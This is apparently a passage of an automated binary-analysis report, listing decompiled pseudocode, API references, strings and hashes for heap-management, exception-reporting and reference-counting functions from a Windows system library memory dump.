String ID:
API String ID: 3298025750-0
Opcode ID: d9f09a32411bd6bcc049ded3e19f943102f140672faf9ce3a0d086cb502f8a92
Instruction ID: 584c682022d0120eeeb69f7c18be4cab992584dcca217433b92714937ef8d3d5
Opcode Fuzzy Hash: d9f09a32411bd6bcc049ded3e19f943102f140672faf9ce3a0d086cb502f8a92
Instruction Fuzzy Hash: 30716771585BC2DBC3718E19CA40B1ABBE1FF42365F151B2DD8E2069E2EF70A480EB45

Uniqueness

Uniqueness Score: -1.00%

Function 6AB8B73D, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E6AB8B73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E6AC2A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x6ac58748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E6AB6B150();
					__eflags =  *0x6ac57bc8;
					if(__eflags == 0) {
						E6AC22073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E6AC2A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x6ac58720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x6ac58720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E6AB8B8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E6AC2A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E6AB8E4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}

0x6ab8b746
0x6ab8b74b
0x6ab8b74d
0x6ab8b750
0x6ab8b755
0x6ab8b758
0x6ab8b758
0x6ab8b75e
0x6ab8b763
0x6ab8b764
0x6ab8b76a
0x6ab8b76d
0x6ab8b771
0x6ab8b776
0x6ab8b85c
0x6ab8b85d
0x6ab8b860
0x6ab8b865
0x6abd2ba1
0x6abd2ba2
0x6abd2ba9
0x6abd2bae
0x6abd2bae
0x6ab8b77c
0x6ab8b77c
0x6ab8b77c
0x6ab8b785
0x6ab8b788
0x6abd2bb6
0x6abd2bb9
0x00000000
0x00000000
0x6abd2bbf
0x6abd2bc5
0x6abd2bc9
0x6abd2be8
0x6abd2bed
0x6abd2bcb
0x6abd2be0
0x6abd2be5
0x6abd2bf3
0x6abd2bf8
0x6abd2bfd
0x6abd2c05
0x6abd2c0e
0x6abd2c0e
0x00000000
0x6ab8b78e
0x6ab8b78e
0x6ab8b78e
0x6ab8b791
0x6ab8b791
0x6ab8b797
0x6ab8b797
0x6ab8b79f
0x6ab8b7a9
0x6ab8b7af
0x6ab8b7af
0x6ab8b7b1
0x6ab8b7b6
0x6ab8b7e2
0x6ab8b7e2
0x6ab8b7e7
0x6ab8b880
0x6ab8b7ed
0x6ab8b7ed
0x6ab8b7ed
0x6ab8b7ef
0x6ab8b7f2
0x6ab8b7f2
0x6ab8b7f5
0x6ab8b7fa
0x6abd2c2d
0x6abd2c2e
0x6abd2c39
0x6ab8b800
0x6ab8b800
0x6ab8b802
0x6ab8b805
0x6ab8b808
0x6ab8b808
0x6ab8b80a
0x6ab8b80d
0x6ab8b816
0x6ab8b81c
0x6ab8b822
0x6ab8b82f
0x6ab8b88b
0x6ab8b892
0x6ab8b897
0x6ab8b899
0x6ab8b89b
0x6ab8b89e
0x6ab8b8a5
0x6ab8b8a8
0x6ab8b8aa
0x6ab8b8ac
0x6ab8b8ac
0x6ab8b8aa
0x6ab8b892
0x6ab8b831
0x6ab8b839
0x6ab8b83b
0x6ab8b83b
0x6ab8b844
0x6ab8b84b
0x6ab8b852
0x6ab8b7b8
0x6ab8b7ba
0x6ab8b7bf
0x6ab8b7c4
0x6abd2c18
0x6abd2c19
0x6abd2c23
0x6ab8b7ca
0x6ab8b7ca
0x6ab8b7cc
0x6ab8b7cf
0x6ab8b7d1
0x6ab8b7d1
0x6ab8b7d4
0x6ab8b7dc
0x6ab8b8bb
0x6ab8b8bb
0x6ab8b8be
0x6ab8b8be
0x6ab8b8c1
0x00000000
0x00000000
0x6ab8b8c3
0x6ab8b8c5
0x6ab8b8c7
0x6ab8b8e0
0x00000000
0x6ab8b8e0
0x6ab8b8cc
0x6ab8b8cc
0x00000000
0x6ab8b8cc
0x6ab8b8d6
0x6ab8b8d6
0x00000000
0x6ab8b7dc
0x6ab8b7b6

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 6ABD2BF3
HEAP[%wZ]: , xrefs: 6ABD2BDB
HEAP: , xrefs: 6ABD2BE8

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: f189271e624b0c7c57cdba18b7a0a75de26131fc282073a7fd4c274c214fd869
Instruction ID: 7342bc84ce40952ecedb3651bd7832b1a6f060d12d9f1d62b94dfdad5e98a1ed
Opcode Fuzzy Hash: f189271e624b0c7c57cdba18b7a0a75de26131fc282073a7fd4c274c214fd869
Instruction Fuzzy Hash: AD61ABB5604281EFDB18CF38C484B6ABBF1FF45304F15856AE8598B253DB31E881EB91

Uniqueness

Uniqueness Score: -1.00%

Function 6ABE7365, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177
nativeCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6ABE7365(intOrPtr* __ecx, char __edx, void* __eflags, char _a4, char _a8, char _a12) {
				signed int _v12;
				int _v20;
				intOrPtr _v24;
				int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				int _v44;
				char* _v48;
				int _v52;
				intOrPtr _v56;
				int _v60;
				char* _v64;
				int _v68;
				intOrPtr _v72;
				int _v76;
				char* _v80;
				int _v84;
				intOrPtr _v88;
				int _v92;
				signed int* _v96;
				int _v100;
				signed int _v104;
				int _v108;
				signed short _v112;
				int _v116;
				intOrPtr _v120;
				int _v124;
				signed int* _v128;
				int _v132;
				intOrPtr _v136;
				int _v140;
				char* _v144;
				int _v148;
				intOrPtr _v152;
				int _v156;
				char* _v160;
				int _v164;
				intOrPtr _v168;
				int _v172;
				char* _v176;
				int _v180;
				intOrPtr _v184;
				int _v188;
				signed int* _v192;
				int _v196;
				signed int _v200;
				int _v204;
				intOrPtr _v208;
				int _v212;
				intOrPtr _v216;
				int _v220;
				signed int* _v224;
				char _v256;
				char _v976;
				intOrPtr _v1036;
				intOrPtr _v1040;
				int _v1044;
				int _v1052;
				void _v1056;
				char _v1057;
				char _v1064;
				char _v1068;
				char _v1072;
				signed int _v1076;
				char _v1080;
				char _v1084;
				char _v1088;
				signed int _v1092;
				char _v1096;
				char _v1100;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t116;
				char _t117;
				int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t153;
				intOrPtr _t155;
				signed short* _t156;
				intOrPtr* _t157;
				signed int _t158;

				_t152 = __edx;
				_t147 = __ecx;
				_v12 =  *0x6ac5d360 ^ _t158;
				_t145 = 0;
				_v1064 = __edx;
				_t157 = __ecx;
				_v1072 = 0;
				_v1068 = 0;
				if(E6AB94E70(0x6ac586e4, 0x6aba9490, 0, 0) >= 0) {
					_t116 =  *((intOrPtr*)(_t157 + 0x1c));
					_t156 = _t116 + 0x24;
					if(_t116 != 0) {
						_t146 =  *(_t116 + 0xa4) & 0x000000ff;
					} else {
						_t156 = 0x6ab41920;
						_t146 = 0xffffffff;
					}
					_t117 = 8;
					_push(0);
					_push(_t117);
					_v1072 = _t117;
					_push( &_v1072);
					_push(0x67);
					E6ABA9860();
					if( *0x6ac553e8 <= 5) {
						L7:
						_t145 = 0;
					} else {
						_t147 = 0x6ac553e8;
						if(E6ABA8F33(0x6ac553e8, 0, 0x8000) == 0) {
							goto L7;
						} else {
							_t153 =  *((intOrPtr*)(_t157 + 0x20));
							_v1076 =  *(_t153 + 0xa4) & 0x000000ff;
							_v1080 =  *((intOrPtr*)(_t157 + 0x10));
							_v1084 =  *((intOrPtr*)(_t157 + 0x14));
							_v1088 = _a4;
							_v1096 = _v1068;
							_v1100 = _a8;
							_v1057 = _a12;
							_v1092 = _t146;
							_t145 = 0;
							_v208 =  *((intOrPtr*)(_t153 + 0x28));
							_v200 =  *(_t153 + 0x24) & 0x0000ffff;
							_v192 =  &_v1076;
							_v176 =  &_v1080;
							_v160 =  &_v1084;
							_v144 =  &_v1088;
							_v128 =  &_v104;
							_t42 =  &(_t156[2]); // 0x6ab45c80
							_v112 =  *_t42;
							_v104 =  *_t156 & 0x0000ffff;
							_v224 =  &_v200;
							_t155 = 2;
							_v96 =  &_v1092;
							_t151 = 4;
							_v80 =  &_v1064;
							_v220 = 0;
							_v216 = _t155;
							_v212 = 0;
							_v204 = 0;
							_v196 = 0;
							_v188 = 0;
							_v184 = _t151;
							_v180 = 0;
							_v172 = 0;
							_v168 = _t151;
							_v164 = 0;
							_v156 = 0;
							_v152 = _t151;
							_v148 = 0;
							_v140 = 0;
							_v136 = _t151;
							_v132 = 0;
							_v124 = 0;
							_v120 = _t155;
							_v116 = 0;
							_v108 = 0;
							_v100 = 0;
							_v92 = 0;
							_v88 = _t151;
							_v84 = 0;
							_v76 = 0;
							_v72 = _t151;
							_v68 = 0;
							_v64 =  &_v1096;
							_v60 = 0;
							_v56 = _t151;
							_v52 = 0;
							_v44 = 0;
							_v48 =  &_v1100;
							_v40 = _t151;
							_v36 = 0;
							_v32 =  &_v1057;
							_v28 = 0;
							_v24 = 1;
							_v20 = 0;
							_t152 = 0x6ab4bcfb;
							_t147 = 0x6ac553e8;
							L6ABE7B9C(0x6ac553e8, 0x6ab4bcfb, _t151, _t151, 0xf,  &_v256);
						}
					}
				}
				E6ABBDDD0( &_v976, _t147, _t152, _t156, _t157);
				memset( &_v1056, _t145, 0x50);
				_v1056 = 0xc0000409;
				_v1052 = _t145;
				_v1044 = _t145;
				_v1040 = 1;
				_v1036 = 0x2d;
				return E6ABAB640(E6ABF0C30(_t145, _t147, _t156,  &_v1056,  &_v976, 0x1e), _t145, _v12 ^ _t158, _t152, _t156, _t157,  &_v976);
			}

0x6abe7365
0x6abe7365
0x6abe7377
0x6abe737d
0x6abe737f
0x6abe7391
0x6abe7393
0x6abe7399
0x6abe73a6
0x6abe73ac
0x6abe73af
0x6abe73b4
0x6abe75b4
0x6abe73ba
0x6abe73ba
0x6abe73bf
0x6abe73bf
0x6abe73c4
0x6abe73c5
0x6abe73c7
0x6abe73c8
0x6abe73d4
0x6abe73d5
0x6abe73d7
0x6abe73e3
0x6abe75c0
0x6abe75c0
0x6abe73e9
0x6abe73f0
0x6abe73fc
0x00000000
0x6abe7402
0x6abe7402
0x6abe740e
0x6abe7417
0x6abe7420
0x6abe7429
0x6abe7441
0x6abe744a
0x6abe7453
0x6abe7459
0x6abe745f
0x6abe746e
0x6abe7476
0x6abe7482
0x6abe748e
0x6abe749a
0x6abe74a6
0x6abe74af
0x6abe74b2
0x6abe74b5
0x6abe74bb
0x6abe74c4
0x6abe74ca
0x6abe74cb
0x6abe74d6
0x6abe74d7
0x6abe74e0
0x6abe74e6
0x6abe74ec
0x6abe74f2
0x6abe74f8
0x6abe74fe
0x6abe7504
0x6abe750a
0x6abe7510
0x6abe7516
0x6abe751c
0x6abe7522
0x6abe7528
0x6abe752e
0x6abe7534
0x6abe753a
0x6abe7540
0x6abe7543
0x6abe7546
0x6abe7549
0x6abe754c
0x6abe754f
0x6abe7552
0x6abe7555
0x6abe7558
0x6abe755b
0x6abe755e
0x6abe7561
0x6abe7564
0x6abe7567
0x6abe756a
0x6abe756d
0x6abe7576
0x6abe7579
0x6abe7582
0x6abe7585
0x6abe7588
0x6abe758b
0x6abe758e
0x6abe7595
0x6abe759e
0x6abe75a8
0x6abe75ad
0x6abe75ad
0x6abe73fc
0x6abe73e3
0x6abe75c9
0x6abe75d8
0x6abe75e0
0x6abe75f0
0x6abe75f6
0x6abe75fc
0x6abe760f
0x6abe762f

APIs

RtlRunOnceExecuteOnce.1105(6AC586E4,6ABA9490,00000000,00000000,00000000,00000000), ref: 6ABE739F
ZwQuerySystemInformation.1105(00000067,?,00000008,00000000,6AC586E4,6ABA9490,00000000,00000000,00000000,00000000), ref: 6ABE73D7

Part of subcall function 6ABA9860: LdrInitializeThunk.NTDLL(6ABF15BB,00000073,?,00000008,00000000,?,00000568), ref: 6ABA986A

RtlCaptureContext.1105(?,6AC586E4,6ABA9490,00000000,00000000,00000000,00000000), ref: 6ABE75C9
memset.1105(?,00000000,00000050,?,6AC586E4,6ABA9490,00000000,00000000,00000000,00000000), ref: 6ABE75D8
RtlReportException.1105(C0000409,?,0000001E,00000000,00000000), ref: 6ABE761A

Strings

-, xrefs: 6ABE760F

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Once$CaptureContextExceptionExecuteInformationInitializeQueryReportSystemThunkmemset
String ID: -
API String ID: 3658138377-2547889144
Opcode ID: 2e47f9d70ffc4db921413a4ed7b753c1edac8de61b7717c49d277db45e8daf1e
Instruction ID: 558f932f68be80b921c913624b2486850d88964a975a73eb21154258c7598194
Opcode Fuzzy Hash: 2e47f9d70ffc4db921413a4ed7b753c1edac8de61b7717c49d277db45e8daf1e
Instruction Fuzzy Hash: 5E818FB1D0526C9EDB60CF69D980BDDFBF4BB48300F5041AEE60CA7241DB705A849F58

Uniqueness

Uniqueness Score: -1.00%

Function 6AB995EC, Relevance: 10.7, APIs: 7, Instructions: 165
timelibraryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6AB995EC(intOrPtr __ecx, signed int __edx, intOrPtr _a4) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t55;
				signed int _t59;
				signed int* _t62;
				void* _t68;
				intOrPtr _t86;
				void* _t90;
				signed int _t91;
				signed int _t92;
				signed int _t95;
				signed int _t111;
				signed int _t114;
				signed int _t116;

				_v8 =  *0x6ac5d360 ^ _t116;
				_t114 = __edx;
				_v28 = __ecx;
				_v24 = 0;
				_v20 = 0;
				_t115 =  *((intOrPtr*)(__edx + 0x58));
				if(_t115 != 0) {
					_push( &_v20);
					_push(0);
					_push(0);
					E6ABA3720(_t90, __edx, __edx, _t115, __eflags);
				}
				_t91 = _t114 + 0x8c;
				_t95 =  *_t91;
				do {
					_t111 = _t95;
					_t55 = _t95 >> 1;
					if(_t55 == 0) {
						_v16 = _v16 & 0x00000000;
						_v12 = _v12 & 0x00000000;
					} else {
						_v16 = 1;
						_v12 = 1;
						if((_t95 & 0x00000001 | _t55 * 0x00000002 - 0x00000002) < 2) {
							_v12 = _v12 & 0x00000000;
						}
					}
					asm("lock cmpxchg [ebx], ecx");
					_t95 = _t111;
				} while (_t95 != _t111);
				_t92 = _t91 | 0xffffffff;
				if(_t115 != 0) {
					__eflags = _v16;
					if(__eflags != 0) {
						__eflags = E6AB9EAA0(_t95, 0, _t115);
						if(__eflags >= 0) {
							_t86 = _v28;
							_t35 = _t86 + 0x50;
							 *_t35 =  *(_t86 + 0x50) | 0x00000100;
							__eflags =  *_t35;
							 *((intOrPtr*)(_t86 + 0x64)) = _t115;
						} else {
							_v16 = _v16 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							_v24 = 1;
						}
					}
					_push(_v20);
					_push(0);
					E6ABA4520(_t92, _t114, _t115, __eflags);
					__eflags = _v24;
					if(_v24 != 0) {
						_t113 = _t92;
						E6AB99ED0(_t114 + 0x20, _t92, 0);
						E6AC38450(_t114);
					}
				}
				if(_v12 != 0) {
					_push(2);
					asm("lock xadd [edi], eax");
					_t59 = E6AB87D50();
					__eflags = _t59;
					if(_t59 != 0) {
						_t62 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t62 = 0x7ffe0386;
					}
					__eflags =  *_t62;
					if( *_t62 != 0) {
						E6AC38A62( *(_t114 + 0x5c), _t114 + 0x78,  *((intOrPtr*)(_t114 + 0x30)),  *((intOrPtr*)(_t114 + 0x34)),  *((intOrPtr*)(_t114 + 0x3c)));
					}
					_t113 =  *(_t114 + 0x5c);
					E6AB99702(_t92, _t114 + 0x78,  *(_t114 + 0x5c),  *((intOrPtr*)(_t114 + 0x74)), 0);
					asm("lock xadd [edi], eax");
					if(__eflags == 0) {
						_t115 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))));
						 *0x6ac5b1e0(_t114);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))))))();
					}
				}
				if(_a4 != 0) {
					_t113 = 0;
					__eflags = E6AB9992F(0);
					if(__eflags != 0) {
						 *((intOrPtr*)(_t114 + 0x70)) = _v0;
						asm("lock xadd [edi], eax");
						if(__eflags == 0) {
							_t115 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))));
							 *0x6ac5b1e0(_t114);
							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))))))();
						}
					}
				}
				if(_v16 == 0) {
					asm("lock xadd [edi], ebx");
					_t92 = _t92 - 1;
					__eflags = _t92;
					if(_t92 == 0) {
						_t115 =  *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))));
						 *0x6ac5b1e0(_t114);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t114 + 4))))))();
					}
					_t68 = 0;
				} else {
					_t113 = _t114;
					E6AB8E63F(_v28, _t114);
					_t68 = 1;
				}
				return E6ABAB640(_t68, _t92, _v8 ^ _t116, _t113, _t114, _t115);
			}

0x6ab995fb
0x6ab99601
0x6ab99603
0x6ab99608
0x6ab9960b
0x6ab9960e
0x6ab99613
0x6abd967f
0x6abd9680
0x6abd9681
0x6abd9682
0x6abd9682
0x6ab99619
0x6ab9961f
0x6ab99621
0x6ab99623
0x6ab99625
0x6ab99627
0x6abd968c
0x6abd9690
0x6ab9962d
0x6ab99634
0x6ab99643
0x6ab99649
0x6ab9964b
0x6ab9964f
0x6ab99649
0x6ab99653
0x6ab99657
0x6ab99659
0x6ab9965d
0x6ab99662
0x6abd969c
0x6abd96a0
0x6abd96aa
0x6abd96ac
0x6abd96bf
0x6abd96c2
0x6abd96c2
0x6abd96c2
0x6abd96c9
0x6abd96ae
0x6abd96ae
0x6abd96b2
0x6abd96b6
0x6abd96b6
0x6abd96ac
0x6abd96cc
0x6abd96cf
0x6abd96d1
0x6abd96d6
0x6abd96da
0x6abd96e5
0x6abd96e7
0x6abd96ed
0x6abd96ed
0x6abd96da
0x6ab9966c
0x6ab9969e
0x6ab996a1
0x6ab996a5
0x6ab996aa
0x6ab996ac
0x6abd9700
0x6ab996b2
0x6ab996b2
0x6ab996b2
0x6ab996b9
0x6ab996bb
0x6abd9719
0x6abd9719
0x6ab996c1
0x6ab996cc
0x6ab996d3
0x6ab996d7
0x6abd9727
0x6abd972b
0x6abd9731
0x6abd9731
0x6ab996d7
0x6ab99672
0x6ab996de
0x6ab996e7
0x6ab996e9
0x6ab996ee
0x6ab996f3
0x6ab996f7
0x6abd973c
0x6abd9740
0x6abd9746
0x6abd9746
0x6ab996f7
0x6ab996e9
0x6ab99678
0x6abd974d
0x6abd9751
0x6abd9751
0x6abd9752
0x6abd9758
0x6abd975c
0x6abd9762
0x6abd9762
0x6abd9764
0x6ab9967e
0x6ab99681
0x6ab99683
0x6ab9968a
0x6ab9968a
0x6ab9969b

APIs

RtlGetCurrentServiceSessionId.1105(00000000,00000001,?,?,7FFE0386), ref: 6AB996A5

Part of subcall function 6AB99702: RtlAcquireSRWLockExclusive.1105(?,?,?,?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6AB9974F
Part of subcall function 6AB99702: RtlReleaseSRWLockExclusive.1105(?,?,?,?,?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6AB9976D

LdrLockLoaderLock.1105(00000000,00000000,00000001,?,?,7FFE0386,?,6AB66778,00000001), ref: 6ABD9682
RtlDebugPrintTimes.1105(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6ABD972B
RtlDebugPrintTimes.1105(?,?,00000000,00000000,00000001,?,?,7FFE0386), ref: 6ABD9740

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: Lock$DebugExclusivePrintTimes$AcquireCurrentLoaderReleaseServiceSession
String ID:
API String ID: 732933571-0
Opcode ID: a9e67cbaefa553604a18045d416202f82ebb78b3fe0da6aff681623be18ff7ff
Instruction ID: a71ad872ee812944f04dd7e0e9b2923bd882223ad033300be0a4c3674646092e
Opcode Fuzzy Hash: a9e67cbaefa553604a18045d416202f82ebb78b3fe0da6aff681623be18ff7ff
Instruction Fuzzy Hash: A7510F71A04689EFDB44EF68C858BAEBBB4FF46314F014129E421D76B1EF749910EB80

Uniqueness

Uniqueness Score: -1.00%

Function 6AB63FC5, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E6AB63FC5(signed int __edx, intOrPtr _a4) {
				void* __ecx;
				signed char _t44;
				signed char _t48;
				intOrPtr* _t50;
				unsigned int _t51;
				signed char _t52;
				signed int _t58;
				signed int _t59;
				intOrPtr _t62;
				intOrPtr* _t64;
				signed int _t65;
				signed int _t78;

				_t58 = __edx;
				_t78 = _t59;
				if(__edx == 0 || (__edx & 0x00000007) != 0) {
					L37:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E6AB6B150();
					} else {
						E6AB6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t58 + 8);
					_push(_t78);
					E6AB6B150("Invalid address specified to %s( %p, %p )\n", _a4);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x6ac56378 = 1;
						asm("int3");
						 *0x6ac56378 = 0;
					}
					return 0;
				} else {
					_t44 =  *((intOrPtr*)(__edx + 7));
					if((_t44 & 0x0000003f) == 0) {
						goto L37;
					}
					if(_t44 < 0) {
						if( *((char*)(_t78 + 0xda)) != 2) {
							_t62 = 0;
						} else {
							_t62 =  *((intOrPtr*)(_t78 + 0xd4));
						}
						if(_t62 != 0) {
							if(_t44 != 4) {
								L23:
								return 1;
							}
						}
						goto L37;
					}
					if( *(_t78 + 0x4c) == 0 || ( *(_t78 + 0x50) ^  *__edx) >> 0x18 == (( *(_t78 + 0x50) ^  *__edx) >> 0x00000010 ^ ( *(_t78 + 0x50) ^  *__edx) >> 0x00000008 ^ _t76)) {
						if( *((char*)(_t58 + 7)) == 4) {
							if((_t58 & 0x00000fff) != 0x18) {
								goto L37;
							}
							L13:
							if( *(_t78 + 0x4c) == 0) {
								_t48 =  *((intOrPtr*)(_t58 + 2));
							} else {
								_t51 =  *_t58;
								if(( *(_t78 + 0x4c) & _t51) != 0) {
									_t51 = _t51 ^  *(_t78 + 0x50);
								}
								_t48 = _t51 >> 0x10;
							}
							if((_t48 & 0x00000004) != 0) {
								if(E6AC123E3(_t78, _t58) != 0) {
									goto L18;
								}
							} else {
								L18:
								if( *((char*)(_t58 + 7)) == 4) {
									goto L23;
								}
								_t64 = _t78 + 0xa4;
								_t50 =  *_t64;
								while(_t50 != _t64) {
									if(_t58 <  *((intOrPtr*)(_t50 + 0x14)) || _t58 >=  *((intOrPtr*)(_t50 + 0x18))) {
										_t50 =  *_t50;
										continue;
									} else {
										goto L23;
									}
								}
							}
							goto L37;
						}
						_t52 =  *((intOrPtr*)(_t58 + 6));
